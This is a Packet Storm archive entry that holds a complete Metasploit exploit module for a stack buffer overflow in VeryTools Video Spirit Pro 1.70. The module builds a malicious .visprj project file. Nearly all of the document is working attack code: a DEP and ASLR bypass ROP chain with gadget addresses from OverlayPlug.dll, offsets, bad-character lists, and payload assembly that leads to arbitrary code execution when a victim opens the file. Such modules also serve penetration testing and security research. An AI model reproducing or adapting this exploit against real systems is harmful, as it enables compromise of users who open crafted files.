VeryTools Video Spirit Pro 1.70 Buffer Overflow

2011-04-11T00:00:00
ID PACKETSTORM:100294
Type packetstorm
Reporter corelanc0d3r
Modified 2011-04-11T00:00:00

Description

                                        
                                            `##  
# $Id: videospirit_visprj.rb 12304 2011-04-11 23:24:12Z sinn3r $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'VeryTools Video Spirit Pro <= 1.70',  
'Description' => %q{  
This module exploits a stack buffer overflow in Video Spirit <= 1.70.  
When opening a malicious project file (.visprj), a stack buffer overflow occurs,  
resulting in arbitrary code execution.  
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Acidgen', #found the vulnerability  
'corelanc0d3r', #rop exploit + msf module  
],  
'Version' => '$Revision: 12304 $',  
'References' =>  
[  
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-001' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 800, #0x320 bytes - avoid marking wrong page as RWX  
'BadChars' => "\x00\x0a\x0b\x0c\x0d\x0e\x0f\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x26\x27\x2f\x3c\x3e",  
'DisableNops' => 'True',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass',  
{  
'OffSet' => 168,  
'OffSetToRop' => 952,  
'Ret' => 0x1006CC10, #overlayplug.dll stackpivot bad char friendly  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Apr 11 2011',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'VideoSpirit project name.', 'msf.visprj']),  
], self.class)  
end  
  
def junk  
return rand_text_alphanumeric(4).unpack("L")[0].to_i  
end  
  
def exploit  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
header = %Q|  
<version value="1" />  
<track>  
<type value="0" />  
<type value="4" />  
<type value="2" />  
<type value="1" />  
<type value="7" />  
</track>  
<track0 />  
<track1 />  
<track2 />  
<track3 />  
<track4 />  
<clip />  
<output typename="AVI" keepaspect="0" presetquality="0">  
<type0 enable="1">  
|  
  
footer = %Q|  
<valitem name="320*240(4:3)" value="320*240" />  
<valitem name="30" value="30" />  
<valitem name="16000k" value="16000k" />  
</type0>  
<type1 enable="1">  
<valitem name="mp3" value="libmp3lame" />  
<valitem name="128k" value="128k" />  
<valitem name="44100" value="44100" />  
<valitem name="2 (Stereo)" value="2" />  
</type1>  
<type2 enable="0" />  
</output>  
|  
print_status("Preparing payload")  
  
pivot = [target.ret].pack('V')  
  
rop_gadgets =   
[  
# one non-ASLR module is enough for generic ASLR & DEP bypass !  
# pvefindaddr rop 'n roll  
# First, grab VirtualProtect ptr  
0x10065292, # POP EAX # RETN [OverlayPlug.dll]  
0x106F4244, # IAT entry + offsqet (bad char friendly)  
0x10019762, # POP EBP # RETN [OverlayPlug.dll]  
0xEFEFEFF0, # bye bye offset  
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]  
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll]  
junk,  
junk,  
junk,  
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll]  
0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll]  
  
# set size  
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]  
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)  
0x10019762, # POP EBP # RETN [OverlayPlug.dll]  
0xEFEFEFF0, # boo  
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]  
0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll]  
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll]  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
junk,  
  
# set NewProtect to 0x40  
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll]  
junk,  
junk,  
junk,  
junk,  
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]  
junk,  
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]  
junk,  
junk,  
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]  
junk,  
junk,  
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]  
junk,  
junk,  
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll]  
junk,  
  
# write pOldProtect to .data section  
0x1001AB51, # POP ECX # RETN [OverlayPlug.dll]  
junk,  
0x10117030, # RW  
  
# EDI : ROP NOP  
0x10057090, # POP EDI # RETN [OverlayPlug.dll]  
0x10057091, # ROP NOP  
  
# pReturn2Payload  
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll]  
0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll]  
0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll]  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1003C946,  
0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll]  
  
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]  
0x41414141,  
  
# go  
0x10066F84, # PUSHAD # RETN [OverlayPlug.dll]  
].pack("V*")  
  
  
buffer = "<valitem name="  
buffer << '"'  
buffer << rand_text_alphanumeric((target['OffSet']))  
buffer << rand_text_alphanumeric(4) #nseh  
buffer << pivot  
buffer << rand_text_alphanumeric((target['OffSetToRop']))  
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7  
buffer << rop_gadgets  
buffer << "\x90" * 150  
buffer << payload.encoded  
buffer << rand_text_alphanumeric(4000)  
buffer << '"'  
buffer << ' value="msmpeg4v2"'  
buffer << "/>"  
buffer << "\n"  
  
filecontent = header + buffer + footer  
  
print_status("Writing payload to file")  
  
file_create(filecontent)  
  
end  
  
end  
`